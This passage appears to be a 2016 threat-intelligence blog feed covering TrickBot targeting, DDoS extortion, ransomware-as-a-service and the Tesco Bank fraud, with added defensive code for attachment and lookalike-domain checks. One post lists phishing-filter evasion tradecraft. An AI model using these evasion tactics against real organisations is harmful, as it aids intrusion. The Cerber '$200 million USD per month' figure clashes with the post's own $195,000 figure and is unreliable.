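def target_host(pattern: str) -> str:
    """Host part of a URL glob, with any leading wildcard label removed."""
    host = re.sub(r"^[a-z]+://", "", pattern, flags=re.IGNORECASE).split("/", 1)[0]
    return host.lstrip("*.").lower()


def country_of(host: str) -> str:
    """Map a host to a country code by its longest matching public suffix."""
    for suffix, country in sorted(SUFFIX_COUNTRY.items(), key=lambda kv: -len(kv[0])):
        if host == suffix or host.endswith("." + suffix):
            return country
    return "unknown"


def count_by_country(patterns) -> dict:
    """Per-location count of inject targets, the shape of the Figure 1 graph."""
    return dict(Counter(country_of(target_host(p)) for p in patterns))


def url_matches(pattern: str, url: str) -> bool:
    """Case-insensitive glob match of a visited URL against one target entry.

    '*' spans any characters including '/', so 'https://x/login*' also
    matches a URL carrying a query string; an entry without a trailing '*'
    only matches that exact URL.
    """
    return fnmatch.fnmatchcase(url.lower(), pattern.lower())


def affected_targets(patterns, org_domains) -> list:
    """Entries whose host sits under one of an organisation's own domains,
    i.e. the entries that would fire on that organisation's customers."""
    domains = [d.lower() for d in org_domains]
    return [
        p for p in patterns
        if any(target_host(p) == d or target_host(p).endswith("." + d) for d in domains)
    ]


if __name__ == "__main__":
    print(count_by_country(SAMPLE_TARGETS))
    print(affected_targets(SAMPLE_TARGETS, ["bank-a.example.com.au"]))
```

    The glob semantics (a bare `*` that also spans `/`) are an assumption chosen so that a `login*` entry still fires on a URL with a query string; a real configuration format should be checked before relying on that.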

    Table 1 – Timeline of TrickBot activity since September 2016

    This malware was initially linked to at least one individual behind the Dyre banking trojan, for which activity ceased around February 2016. While the effective deployment of TrickBot and its subsequent rapid development was assessed to be consistent with a group that had considerable experience of banking trojan operations, this connection to the group responsible for the Dyre malware was not confirmed.

    In October 2016 TrickBot was known to have targeted bank customers in Australia and Canada, but throughout November and December 2016 both the number of banks affected and the locations of these banks increased dramatically. At the time of writing the number of bank and financial services domains included in a detected configuration file totaled approximately 85. This is shown based on separate geographical locations in Figure 1 below.

    Figure 1 – Graph showing the number of domains in each location affected by TrickBot activity

    Currently, the country most affected by TrickBot activity is Australia, based on the number of bank domains included in TrickBot’s configuration file. The reasons for this were unknown, but the overall targeting by TrickBot demonstrated that financial services customers in English-speaking countries were the most targeted. The number of locations that have been affected by TrickBot activity, coupled with the number of bank domains featured in the configuration files for this malware, demonstrated that the actors behind it likely had a relatively large amount of resources – including finances, capability and time. This assessment was based on the developments to the malware and the significant increase in the number of targets that we have observed within the three month period since TrickBot was first discovered. Broadening the targeting and attempting to access bank accounts through TrickBot activity would likely only be profitable provided that the appropriate resources were in place to cash out compromised bank accounts. Thus the increased scale of targeting for this malware was representative of not just a likely increase in development resources, but physical, human resources as well.

    The rate of development detected for TrickBot suggests it is likely that it would continue to be developed, including the addition of new target geographies and further banks to its configuration. The target geographies to date showed that a majority of TrickBot’s activity affected predominantly English-speaking countries, particularly in relation to financial services and banks. This may give some insight into potential future targets for this malware; nevertheless, it was assessed as a realistic possibility that further non-English speaking geographies would also be affected in future.

    The statistics in Figure 1 indicate that Trickbot had primarily affected customers of banks and financial services in Australia. As the number of banks in Australia that have been targeted has continued to increase since the malware’s discovery in September 2016, it was assessed as likely that the targeting of the Australian region would continue in the near future.

    Banking trojans, while not as widely reported as other malware such as ransomware, have continued to be perceived as profitable by threat actors and groups throughout 2016. While some disruption to the infrastructure and operations of these trojans has occurred – for example, a law enforcement operation launched in October 2015 against the Dridex malware reportedly partially disrupted its activity – we detected no indication that overall banking trojan activity would reduce in 2017.

    Crowdsourced DDoS Extortion – A Worrying Development? Tue, 13 Dec 2016 15:35:09 +0000 We all know about DDoS extortion – the process is straightforward: contact the company and threaten to launch a crippling DDoS attack unless it pays a ransom. But what if the actors do not target the company itself for the ransom, but its customers?

    DDoS extortion was hot stuff in the first half of 2016. While Europol announced the arrest of members of DD4BC, other actors going by names like Kadyrovtsy and Armada Collective emerged. Although there were fewer reports of DDoS extortion in the second half of 2016, the public release of the Mirai botnet source code offers new opportunities for extortionists.

    We’ve already seen examples of this, in the case of a DDoS against Squarespace. On November 22, 2016, the US-based web hosting and building service Squarespace was affected by two distributed denial of service attacks that affected customers between 0029 EST and 0954 EST. Some customers of Squarespace operate e-commerce sites, therefore it was assessed as likely that financial losses were incurred as a result of the attacks. Twitter accounts responded to statements by Squarespace, claiming to be a previously known threat actor called “vimproducts”, who has advertised DDoS services on the AlphaBay Dark Web marketplace. These accounts were detected claiming responsibility for the DDoS attacks and attempting to extort Squarespace for up to $2,000 USD.

    In one post on Pastebin, the author described it as a “crowdfunded extortion”. While there was no evidence of a ransom being paid, it is possible that it was an attempt by vimproducts to generate publicity for their DDoS-as-a-service offering. The targeting of organizations’ customers is a worrying trend.

    Fig 1: Post on Pastebin claiming to be by Vimproducts


    Fig 2: Vimproducts advertising a DDoS service on a dark web marketplace

    More recently, on November 29, 2016, customers of Valartis Bank received ransom messages from an unidentified actor claiming to possess their account data and demanding 10 percent of their balance in order to prevent their data from being leaked. Valartis Bank’s parent company reportedly confirmed a breach took place but stated only payment order information was obtained. Statements made by the author of the messages published in the Bild newspaper suggested a realistic possibility the attackers had attempted to approach the bank itself prior to contacting customers.

    The threat of DDoS and extortion attacks on retailers and e-commerce sites is particularly heightened in the run-up to Christmas. Actors will likely deem the busy sales period an opportune moment to showcase their capability or to cause widespread disruption by targeting retailers.

    While the case of vimproducts and Squarespace may have occurred as a secondary approach to gaining a ransom payment, what if this was the first target for adversaries? How prepared would companies be to combat this threat? Organizations should consider such alternative scenarios in 2017, as the public release of Mirai can act as a force multiplier for criminal operations.

    You Should Consider Forecasts, Not Predictions Fri, 09 Dec 2016 16:41:44 +0000 Well, it’s that time of year again. Sorry, not the Lexus December to Remember Sales Event (don’t you just love those commercials), rather 2017 prediction season. Vendors and media alike take out their crystal balls and peer into the future. Given my 4+ years as a Forrester analyst, I’ve written many predictions as well. Speaking of analyst predictions, Rich Mogull from Securosis has some of the best predictions ever made; check them out. Rich’s perspective is shared by many who loathe prediction season.

    Given that Digital Shadows has a team of former law enforcement/government/military intelligence analysts, as well as classically trained graduate level intelligence analysts, we should take advantage of it. Instead of writing yet another predictions blog, we decided to leverage the same type of structured analysis techniques we use to service our clients to develop a forecast. Given the coverage/hype/hysteria surrounding Mirai and IoT denial of service we decided to focus our forecast on that. On Wednesday December 14th, we will be conducting two live webinars. You can sign up for “Forecasting the 2017 DDoS landscape” here.

    For the webinars, we are going to use an analysis technique known as the Cone of Plausibility (see figure 1). According to “Creating Strategic Visions” from the US Army War College, the Cone of Plausibility is a “theoretical process that can be used by one or more persons to project trends and events and their consequences holistically into the future.” It “permits a logical progression into time and the creation of alternative scenarios at preselected points or intervals called forecast or planning focus planes.”

    Figure 1. Cone of Plausibility  

    The Cone of Plausibility is useful to the analyst and the intelligence consumer in that it provides a structured way of forecasting possible future scenarios, as well as an audit trail of how the scenarios were developed. The forecast isn’t a high-level claim made with little if any analytical rigor, because all of the drivers that are assessed to contribute to a given question are listed alongside analyst assumptions of how these drivers will continue. The Cone of Plausibility also allows assumptions to be changed so that other scenarios, such as wild cards, can be developed.

    Before creating scenarios, it is necessary to agree upon the timeframe to consider. The current and historical conditions are then assessed, enabling the analysts to identify the main drivers and trends that contribute to the forecast. 

    In order to produce the three scenarios (preferred, probable, and wildcard), underlying assumptions are explicitly listed. The most probable or “baseline” scenario is built upon a continuation of what we have already observed, coupled with any future influencing events that may change a scenario. Estimating the likelihood of a scenario is largely based on what we have seen already, coupled with an analyst’s experience and assumptions. 

    In order to produce alternative plausible scenarios, one or two assumptions are changed, resulting in different outcomes. Changing even more assumptions in a radical way will create a vastly different, possible scenario – known as a wild card.

    In this way, the cone of plausibility allows for the development of scenarios that are within the bounds of possibility and allows for the thought process behind these scenarios to be more clearly documented and understood. While any number of scenarios can be generated using the cone of plausibility, three provides a solid spectrum for consideration. You can check out this Scenario Planning document for more information.

    For this week’s webinars, we are going to use the Cone of Plausibility model to provide forecasts for: 

    • Threat Actors Using DDoS as a Protest Tool

    • Threat Actors Using DDoS as an Extortion Tool

    • Threat Actors Using DDoS as a Political Tool


    Adam Lorimer and I hope you will join us. 

    The Top Three Most Popular Blogs of 2016 Thu, 08 Dec 2016 15:01:28 +0000 It’s been a great year for the Digital Shadows blog; we started it off by winning the “Best New Security Blog or Podcast” at the Security Blogger Awards at RSA Conference. This year we produced a wide range of posts focusing on the activities of hacktivists, cybercriminals and nation state actors. When we looked back at this year’s statistics, there were three blogs that really resonated and caught the attention of our readers.

    1. An Analysis of Competing Hypotheses for the Tesco Bank Incident

    In November, following reports of fraudulent activity on some Tesco Bank customer accounts, there was a high level of ambiguity around how the attacks were conducted. This made it a good candidate for an Analysis of Competing Hypotheses (ACH). This blog post outlined four hypotheses and assessed the available evidence to ascertain which one was least inconsistent with the information available. This blog was picked up by The Register, who wrote their own article on the findings.

    Analytical tradecraft has been popular among readers, with previous blogs on the Intelligence Cycle and Language of Uncertainty having also attracted significant attention.

    2. Your One Stop Shop For Cybercrime

    While researching the activities of the actor known by the alias “Tessa88”, we came across an outsourced online shop offering called Just as we have seen with the DDoS-as-a-service market, there continues to be a lowering of barriers to entry into the cybercriminal world. This site is a reminder that the dark web does not monopolize criminality, and the clear web can teach us just as much – if not more – about the activities of cybercriminals. This blog was picked up by a range of publications, such as Softpedia, Infosecurity Magazine and SC Magazine.

    3. 97 percent of the top 1000 companies suffer from credential compromise

    Third, our research into credential exposure revealed the extent to which the credentials of organizations’ employees have been leaked online. As we continue to see reports of password reuse, the research provided an overview of how adversaries use this information and what you can do to protect yourself. This research went on to be featured in the Financial Times and Fortune.

    Check out these three blogs and stay tuned for some great content coming your way in 2017.

    Fig 1: Some items from the Digital Shadows blog that were picked up by the media

    A Model of Success: Anticipating Your Attackers’ Moves Thu, 01 Dec 2016 15:21:09 +0000 In a previous blog, we discussed the role of planning in offensive operations and the power that effective planning affords an actor. For an actor conducting an offensive operation, their capability to achieve their goal is predicated on a number of things:

    • The number of different scenarios that they can envisage at each stage of the operation
    • Their ability to still operate effectively in each scenario despite imposed limitations

    Depending on the type of attacker, their tools, tactics and procedures mean that they are able to respond to changes in their operational environment. A low capability actor may be more of a “one trick pony”, exploiting a particular known SQL injection vulnerability or having a single phishing payload. Once that avenue is discovered by the defenders and appropriate controls are deployed, that particular actor is frozen out. A more capable actor will have either planned for such a scenario or have the resources to be able to improvise within an appropriate operational timescale.

    Being able to predict when such roadblocks might appear requires a certain level of anticipatory decision making from the adversary. That is, being able to anticipate the likely moves of the target in advance. The closer these predictions track reality, the greater the chance of the attacker’s success in breaching the target and completing its mission will be. In order to track reality as closely as possible, the attackers must have a model of the defenders, if not specifically for a particular target, then at least in general. This model must give, at the very least, a rough outline of the tools, tactics and procedures that defenders typically use in order to prevent intrusions.

    For example, in order to protect against phishing, organizations often operate a spam blacklist, block certain types of attachments, disable macros across the organization and conduct security awareness training for employees. An effective attacker must be aware of these security controls and have options to bypass each of them, for example:

    • hijacking high-reputation domains to evade blacklists;
    • knowing which tricks bypass attachment filtering, such as embedding files inside whitelisted or commonly accepted attachment types;
    • having several options for gaining code execution on an endpoint, e.g. through embedded OLE packages;
    • knowing that basic phishes may be caught, and so using a template that is likely to be accepted, such as one that mimics a known supplier to the target organization.

    Similarly, in order for defenders to be successful at protecting their networks, they must also have a model of attacker behavior which allows them to predict and anticipate the likely moves that attackers will make as they try to achieve their goals. Unfortunately this attacker model – also known as a threat model – is often neglected by many organizations. Without a clear understanding of which attackers are likely to target an organization, based on the critical assets it holds, and of the capabilities those attackers have, it is difficult to build a model that accurately anticipates the approaches an attacker is likely to take.

    The main issue with a poor model is that it leads to incorrect prioritization of security controls. Spear-phishing with macro-enabled Microsoft Office documents is still the preferred route for initial compromise in targeted intrusions, but many organizations do not arrange their security priorities in such a way as to mitigate this threat first and foremost. Similarly, the exploitation of vulnerable browser plugins by exploit kits to deploy ransomware is another significant threat to organizations. Still, many organizations do not have a robust set of practices to patch these plugins in a timely fashion and deploy exploit mitigations like the (sadly to be missed) Microsoft EMET system.
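    One control that follows directly from this model, added here as an example written for this page rather than code from Digital Shadows or from the CBEST material: an inbound attachment check that does not stop at the file extension but opens an Office Open XML attachment as the zip package it is and looks for the VBA project part and for embedded OLE objects, the two routes named above (macro-enabled documents, and files embedded inside an accepted attachment type). The part names checked are the standard OOXML locations; the sample attachments are built in memory and are constructed for the example.

```python
import io
import zipfile

# Standard OOXML part locations for a VBA project (macro code) and for
# embedded OLE objects, across Word, Excel and PowerPoint packages.
MACRO_PARTS = {"word/vbaproject.bin", "xl/vbaproject.bin", "ppt/vbaproject.bin"}
EMBED_PREFIXES = ("word/embeddings/", "xl/embeddings/", "ppt/embeddings/")
# Signature of a legacy OLE2 compound file (.doc/.xls/.ppt and OLE packages).
OLE2_MAGIC = b"\xd0\xcf\x11\xe0\xa1\xb1\x1a\xe1"


def inspect_office_attachment(data: bytes) -> dict:
    """Look inside an attachment instead of trusting its extension.

    Returns the detected container, whether a VBA project part is present,
    the embedded object parts found, and a verdict of 'allow', 'block' or
    'review' (the last for anything this check cannot unpack).
    """
    report = {"container": "unknown", "has_macros": False,
              "embedded_objects": [], "verdict": "review"}
    if data.startswith(OLE2_MAGIC):
        # Legacy binary format: zipfile cannot unpack it, so send to manual review
        report["container"] = "ole2"
        return report
    try:
        package = zipfile.ZipFile(io.BytesIO(data))
    except zipfile.BadZipFile:
        report["container"] = "not-a-package"
        return report
    report["container"] = "ooxml"
    names = package.namelist()
    lowered = [n.lower() for n in names]
    report["has_macros"] = any(n in MACRO_PARTS for n in lowered)
    report["embedded_objects"] = [
        n for n in names if n.lower().startswith(EMBED_PREFIXES)
    ]
    blocked = report["has_macros"] or bool(report["embedded_objects"])
    report["verdict"] = "block" if blocked else "allow"
    return report


def build_package(parts: dict) -> bytes:
    """Build a minimal OOXML-style zip in memory (constructed test data)."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as package:
        for name, content in parts.items():
            package.writestr(name, content)
    return buf.getvalue()


# Constructed samples: a clean document, one carrying a VBA project, and one
# carrying an embedded OLE object (only the package layout matters here).
BASE = {"[Content_Types].xml": b"<Types/>", "word/document.xml": b"<w:document/>"}
CLEAN_DOCX = build_package(BASE)
MACRO_DOCM = build_package({**BASE, "word/vbaProject.bin": b"\x00" * 16})
EMBEDDED_DOCX = build_package(
    {**BASE, "word/embeddings/oleObject1.bin": OLE2_MAGIC + b"\x00" * 8}
)

if __name__ == "__main__":
    for label, sample in [("clean", CLEAN_DOCX), ("macro", MACRO_DOCM),
                          ("embedded", EMBEDDED_DOCX)]:
        print(label, inspect_office_attachment(sample))
```

    The check is deliberately content-based: a `.docx` extension with a VBA project inside, or a renamed `.docm`, is flagged the same way, and anything that is not an OOXML package (including legacy OLE2 binaries) is routed to review rather than silently allowed.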

    At Digital Shadows, we follow the approach to threat modelling as laid out by the CBEST intelligence-led testing approach. An introduction to this can be found in the “An Introduction to Cyber Threat Modelling” document. It describes how to understand the goal-orientation of the threat actor, the capabilities they possess and their general modus operandi. This allows a defender to systematically develop a model of attack behavior and match that to their organization’s critical assets. Through understanding which threat actors are known to target particular critical assets (e.g., Point of Sale terminals, sensitive internal documents or customer data) and a comprehensive assessment of threat actor capabilities, an organization can better plan for likely attacker scenarios.

    Windows Shopping: 7 Threats To Look Out For This Holiday Season Wed, 23 Nov 2016 17:39:57 +0000 Thanksgiving, Black Friday, Cyber Monday, Christmas. There’s a lot of shopping to be done between now and the end of 2016. As throngs of discerning shoppers flock to the high street and online shopping carts are filled to the brim, cybercriminals are busy preparing their wares to take advantage of the high sales period. With this in mind, we decided to outline some of the biggest threats facing both retailers and consumers in the upcoming holiday season:

    1. DDoS attacks – With the Mirai botnet demonstrating its ability to launch high-volume denial of service (DDoS) attacks, some might deem the busy sales period as an opportune moment to showcase their capability or cause widespread disruption by targeting retailers. Allied to this is the threat of DDoS extortion, as attackers may use the threat of disabling retail operations during the busiest period of the year as a means of earning a quick profit. Just this week the web hosting and building service Squarespace was affected by two DDoS attacks that affected a number of e-commerce sites. A user on the AlphaBay Dark Web marketplace claimed responsibility for the attacks and alleged they had tried to extort Squarespace for up to $2,000 USD, though this was not confirmed. The same user also advertised their DDoS services online, specifying their availability on Black Friday (see Figure 1 and Figure 2 below).

    Figure 1: AlphaBay user offers DDoS botnet rental service

    Figure 2: The same user specifies that they can conduct attacks on particular days – for example Black Friday (Nov 25)

    2. Compromise of e-commerce sites – This issue has emerged as a problem in 2016 with thousands of ecommerce sites being infected with key-loggers designed to steal credit card data entered into online checkout forms. Many of the compromised websites ran the Magento shopping cart system, though other platforms such as Powerfront CMS and OpenCart, as well as payment processing systems such as Braintree and VeriSign were also purportedly targeted.

    3. POS malware – Cybercriminals are likely to exploit the large number of transactions conducted during the next month by targeting point of sale devices (POS) such as card readers and payment terminals. When a new campaign for the POS malware known as FastPoS was discovered in September 2016, it became clear that the malware was still under active development. A similar pattern was detected in 2015, whereby new campaigns and upgrades appeared to occur in the months leading up to Christmas. It’s highly likely that the same will occur in 2016.

    4. Skimming – In a similar vein to POS malware, cybercriminals will likely seek to take advantage of the increased number of withdrawals made at ATMs this season. These card reading devices aren’t always easy to spot. In September, U.S. authorities warned of a new technique known as ‘periscope skimming’ which involves the use of a specialized skimming device connected directly to the ATM’s internal circuit board.[1] This technique was likely developed in response to anti-skimming measures, and criminals are almost certain to be developing new ways to avoid detection.

     5. Phishing pages – Attackers will try and trick users through fake websites that at face value look incredibly similar to those belonging to legitimate retailers. These sites, however, often steal victims’ credentials when they try to make a purchase, or will be used as a landing page to download a particular strain of malware. We expect phishing email campaigns encouraging users to visit these sites to be particularly prevalent at this time of year.

     6. Malvertising – Attackers can use online advertising as a means of distributing malware, luring victims with one-time offers and bargain prices. These will usually involve an attacker injecting malicious code into a legitimate advert which will either download malware directly onto a victim’s machine or redirect visitors to a website that facilitates the distribution of malware. Pop-ups, banners and promotional offers pushed through social media feeds can be used for these purposes. Sometimes attackers even create adverts that appear to point to legitimate sites by shortening or changing the URL displayed on the advert itself.

    7. Banking malware – Banking trojans remain a threat all year round, but research from Kaspersky has indicated that attacks using financial malware increased around the time of Black Friday and Cyber Monday, and the Christmas period in 2014 and 2015.[2] One reason for this might be that as more people shop online during this time, attackers will try and distribute their malware via fake or compromised sites, or through phishing email campaigns. These can also be used to deliver additional malicious payloads. A recent Kronos banking trojan phishing campaign, for example, was discovered to be targeting victims in the UK and US. While Kronos infections are bad enough, Kronos was also downloading a new POS malware dubbed ScanPOS which was capable of stealing credit card numbers.
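    For items 5 and 6 above, a defender-side check added here as an example rather than anything from the original post: it classifies a candidate hostname against a list of protected brand labels (same label under another suffix, brand with an added affix, a short edit distance from the brand, brand hidden in a subdomain), and flags links whose visible text names one host while the href points to another, the display trick mentioned under malvertising. The brand names, the known-good domain set and every hostname tested are constructed; the public-suffix handling is a small assumed table rather than the full public suffix list.

```python
import re
from urllib.parse import urlparse

# Constructed brand labels to protect and the domains known to belong to them.
BRANDS = ["examplestore", "examplebank"]
KNOWN_GOOD = {"examplestore.com", "examplebank.com"}
# Constructed, deliberately small set of second-level labels treated as part of
# the public suffix (a production check would use the public suffix list).
SECOND_LEVEL = {"co", "com", "org", "net"}


def levenshtein(a: str, b: str) -> int:
    """Plain edit distance (insert / delete / substitute, each costing 1)."""
    prev = list(range(len(b) + 1))
    for i, ca in enumerate(a, 1):
        cur = [i]
        for j, cb in enumerate(b, 1):
            cur.append(min(prev[j] + 1, cur[j - 1] + 1, prev[j - 1] + (ca != cb)))
        prev = cur
    return prev[-1]


def registrable_label(host: str) -> str:
    """The label the registrant chose, e.g. 'examplestore' in examplestore.co.uk."""
    labels = host.lower().strip(".").split(".")
    if len(labels) >= 3 and labels[-2] in SECOND_LEVEL:
        return labels[-3]
    return labels[-2] if len(labels) >= 2 else labels[0]


def classify(host: str) -> str:
    """Classify a hostname relative to the protected brands."""
    host = host.lower().strip(".")
    if host in KNOWN_GOOD or any(host.endswith("." + g) for g in KNOWN_GOOD):
        return "legitimate"
    label = registrable_label(host)
    for brand in BRANDS:
        if label == brand:
            return f"tld-swap:{brand}"            # same label under another suffix
        if brand in label:
            return f"brand-with-affix:{brand}"    # e.g. brand + "-deals"
        if levenshtein(label, brand) <= 2:
            return f"typo:{brand}"                # swapped or substituted characters
        if any(brand in part for part in host.split(".")):
            return f"brand-in-subdomain:{brand}"  # brand left of the real domain
    return "unrelated"


def link_text_mismatch(text: str, href: str) -> bool:
    """True when the anchor text names one host but the link goes elsewhere."""
    shown = re.search(r"(?:https?://)?([a-z0-9.-]+\.[a-z]{2,})", text.lower())
    if not shown:
        return False  # plain text such as "Click here" makes no host claim
    actual_host = urlparse(href.lower()).hostname or ""
    return registrable_label(shown.group(1)) != registrable_label(actual_host)


if __name__ == "__main__":
    for candidate in ["www.examplestore.com", "examplestore.co",
                      "examplestore-blackfriday.com", "exampelstore.com",
                      "examplestore.com.evil.example", "unrelatedshop.com"]:
        print(candidate, "->", classify(candidate))
    print(link_text_mismatch("examplestore.com/deals", "https://exampel-store.co/x"))
```

    The categories are ordered from most to least specific so that an exact label match is reported as a suffix swap rather than as a typo; the edit-distance threshold of 2 is a tunable assumption and, on short brand labels, should be lowered to avoid false positives.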




    Ransomware-as-a-service: The Business Case Tue, 22 Nov 2016 18:02:13 +0000 It can be tempting to dismiss cybercriminal activity as merely the workings of opportunistic actors looking to make a fast buck. While sometimes true, we should remember that cybercriminal operations can be highly sophisticated endeavors often backed by sound business logic and based upon established practices implemented by legitimate businesses. The rise of malware-as-a-service offerings is testament to this, with cybercriminals realizing that there are great profits to be made from providing their services to actors with less technical capabilities.

    One particular business model – ransomware-as-a-service (RaaS) – has been on the rise over the past 12 months. These services allow ransomware operators to rent out their variants to customers, who will spread the malware in return for a percentage of the profits. In July the cybercriminal group Janus announced that the Petya and Mischa ransomware variants were available for rent, while in August the Shark Ransomware Project was launched, allegedly allowing customers to create their own customizable malware with the operators accruing 20 percent of the profits. Recent reports have suggested that the Cerber RaaS offering had takings of over $200 million USD per month, which serves to underscore the immense profitability of this model.

    At Digital Shadows we try to take an attacker’s-perspective in order to identify the most pertinent threats facing our clients. By the same token, we can use this approach to better understand the rise of RaaS.

    So what’s the business case? What is immediately obvious is that RaaS allows the ransomware operator to dramatically increase the number of infections and scale of targeting in ways that could not be achieved if they operated the ransomware themselves. Traditional ransomware variants rely on a distribution network of only a handful of campaigns; Cerber, on the other hand, reportedly currently runs over 160 active campaigns, infecting nearly 150,000 victims with a profit of $195,000 in July 2016 alone.[1] Sounds good, but what are the hidden costs and weaknesses of this model, and what threats and opportunities can we forecast? By using a SWOT analysis we can go some way to understanding some of the considerations that cybercriminals have to take into account:

    Figure 1: SWOT analysis of RaaS business model

    What becomes clear is that successful RaaS offerings rely on their owners treating their operations like a legitimate business. This means building up a strong reputation, marketing your service effectively across underground forums, providing a level of customer service for your users, and dealing with issues of liability. Another interesting consequence of the need to legitimize these businesses is that cybercriminals have begun to move away from the relative obscurity of the dark web in order to market their services. The Shark Ransomware Project (Figure 2) was hosted on the deep web (i.e. not indexed by traditional search engines) rather than on the dark web, while the Janus group use Twitter as a means of advertising and engaging with customers of their Petya and Mischa offerings (see Figure 3).


    Figure 2: Shark Ransomware Project homepage


    Figure 3: “Your call is very important to us. Please stay on the line.”

These business models are by no means unique to ransomware. Many other groups offer tools such as malware customizers and simple point-and-click distributed denial-of-service (DDoS) services that offer botnets for hire. The transition mirrors developments in the software industry in the late 2000s, when software-as-a-service (SaaS) and platform-as-a-service (PaaS) products became ubiquitous.

This parallel can also help us forecast the ways in which these newer cybercriminal marketplaces will develop. The shift to SaaS and PaaS generally resulted in an increase in the quality of products as competition intensified. Likewise, it is likely that as more RaaS offerings come onto the market, operators will not only have to improve the quality of their ransomware variants, but will also have to focus on refining the user-experience and customer-service elements of their businesses. As competition increases, the less effective RaaS products will likely disappear, while those with the best reputation will consolidate their place in the market. The Shark Ransomware Project, for example, was forced to undergo a complete re-branding exercise after reports that the service's creator was keeping all the profits severely damaged its reputation. Re-launched as the Atom Ransomware Affiliate Program (AKA AtomProject), the operators sought to drive home the improved usability features of the service, which included a new graphical interface for easier customization, unlike the older Shark predecessor, which used a command-line interface (see Figure 4 and Figure 5).


    Figure 4: Atom Ransomware Affiliate Program advertised on criminal location


    Figure 5: AtomProject marketer emphasizes the new interface and easier to use payload builder


[1] Check Point, CerberRing: An In-Depth Exposé on Cerber Ransomware-as-a-Service, 15 Aug 2016

Leak on Aisle 12! An Analysis of Competing Hypotheses for the Tesco Bank Incident Fri, 11 Nov 2016 15:59:09 +0000 On November 6, 2016 multiple UK media outlets reported that the UK-based Tesco Bank had informed approximately 40,000 customers that fraudulent activity had been detected on their accounts between November 5 and 6, 2016. It was initially reported that approximately 20,000 of these accounts had been the victim of successful fraudulent transactions. However, it was later reported that the actual number of affected accounts was only approximately 9,000, from which an estimated £2.5 million GBP (approximately $3.1 million USD) had been stolen through fraudulent online transactions. On November 7, 2016 the UK National Cyber Security Centre (NCSC) issued a statement announcing that an investigation was underway, but that the organization was "unaware" of any threat to the wider UK banking sector as a result of this incident.

In addition to this media reporting, we have identified multiple instances of Tesco Bank customers claiming that fraudulent online transactions had been made from their accounts over the weekend. We identified multiple independent reports stating that a small transaction of around £20 GBP (approximately $25 USD) was initially made, followed by a larger transaction of between £500 and £800 GBP ($621-994 USD). We also identified one user claiming that cash had been fraudulently withdrawn from his account at an ATM located in Rio de Janeiro.

    An examination of online criminal activity assessed to be potentially related to this incident indicated that in 2016, Tesco Bank login pages were included as a target in the config files of three major banking trojans: Vawtrak, Dridex and Retefe. In addition to this, we identified a user on the forum associated with the criminal marketplace AlphaBay claiming to be able to cash-out Tesco Bank accounts with the assistance of an insider at the bank. This post was dated September 2016.


    Figure 1 – Screenshot of AlphaBay forum post referring to an insider at Tesco Bank.

At the time of writing, very little information had been released regarding how these thefts were conducted, though several sources have publicly expressed theories regarding how the attack may have been achieved. In response to this ambiguous situation, Digital Shadows has applied the technique of Analysis of Competing Hypotheses (ACH) to the available data. ACH is a structured analytical technique designed to enable analysts to establish the consistency and inconsistency of all available data points with a selection of possible hypotheses. ACH uses a weighted inconsistency algorithm to assign numeric values, weighted by the assessed reliability and relevance of each data point, which represent the degree of inconsistency of the available evidence with a given hypothesis; the hypothesis with the least inconsistent evidence, rather than the most supporting evidence, is preferred. The following hypotheses relating to how the attack may have been accomplished were examined:

    • H1 – Tesco Bank’s payment system was compromised, either through an external intrusion or insider action.
    • H2 – The attack was a cash-out operation representing the culmination of a banking trojan campaign targeting Tesco Bank customers.
    • H3 – The attack was a cash-out operation targeting Tesco Bank cards cloned prior to being issued to customers.
    • H4 – The attack was a cash-out operation using Tesco Bank card information obtained from multiple sources, such as third-party site compromises or point of sale malware.


    Figure 2 – ACH diagram
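The weighted inconsistency scoring described above, as an added worked example (this is not Digital Shadows' tool, and the evidence items, credibility/relevance weights and consistency ratings are constructed for illustration; they only mirror the qualitative assessment in the text and are not the values behind Figure 2):

```python
"""Worked example of the weighted inconsistency scoring used in Analysis of
Competing Hypotheses (ACH). Added illustration of the method, not Digital
Shadows' tool: the evidence list, weights and ratings below are constructed
for this example and are not the matrix behind Figure 2."""
from dataclasses import dataclass

# Consistency ratings for one evidence/hypothesis cell. ACH scores only
# inconsistency: consistent or neutral cells contribute nothing, because a
# hypothesis is not "proved" by evidence that fits several hypotheses.
RATING_SCORE = {
    "CC": 0.0,  # very consistent
    "C": 0.0,   # consistent
    "N": 0.0,   # neutral / not applicable
    "I": 1.0,   # inconsistent
    "II": 2.0,  # very inconsistent
}

@dataclass
class Evidence:
    label: str
    credibility: float  # 0..1: how reliable the source is
    relevance: float    # 0..1: how much the item bears on the question
    ratings: dict       # hypothesis id -> rating code

HYPOTHESES = ["H1", "H2", "H3", "H4"]  # as defined in the post

# Constructed ratings (not the post's actual matrix).
EVIDENCE = [
    Evidence("NCSC: no threat to the wider UK banking sector", 0.9, 0.8,
             {"H1": "C", "H2": "I", "H3": "C", "H4": "I"}),
    Evidence("Thefts confined to a roughly 48-hour window", 0.8, 0.7,
             {"H1": "C", "H2": "I", "H3": "C", "H4": "I"}),
    Evidence("Reported focus on current accounts, not credit accounts", 0.6, 0.6,
             {"H1": "N", "H2": "I", "H3": "C", "H4": "I"}),
    Evidence("AlphaBay post claiming an insider at Tesco Bank", 0.4, 0.7,
             {"H1": "C", "H2": "N", "H3": "N", "H4": "N"}),
    Evidence("Tesco Bank pages in Vawtrak/Dridex/Retefe configs", 0.8, 0.5,
             {"H1": "N", "H2": "C", "H3": "N", "H4": "N"}),
    Evidence("Small test transaction followed by a larger one", 0.7, 0.5,
             {"H1": "C", "H2": "C", "H3": "C", "H4": "C"}),
]

def inconsistency_scores(hypotheses, evidence):
    """Weighted inconsistency per hypothesis. Lower is better: ACH prefers the
    hypothesis with the least evidence against it, not the most evidence for it."""
    scores = {h: 0.0 for h in hypotheses}
    for item in evidence:
        weight = item.credibility * item.relevance
        for h in hypotheses:
            scores[h] += weight * RATING_SCORE[item.ratings.get(h, "N")]
    return scores

def rank(scores):
    """Hypotheses from least to most inconsistent (ties keep input order)."""
    return sorted(scores, key=scores.get)

def non_diagnostic(hypotheses, evidence):
    """Evidence rated the same against every hypothesis cannot discriminate
    between them; ACH practice is to drop or re-examine such items."""
    return [e.label for e in evidence
            if len({e.ratings.get(h, "N") for h in hypotheses}) == 1]

if __name__ == "__main__":
    scores = inconsistency_scores(HYPOTHESES, EVIDENCE)
    for h in rank(scores):
        print(f"{h}: {scores[h]:.2f}")
    print("non-diagnostic:", non_diagnostic(HYPOTHESES, EVIDENCE))
```

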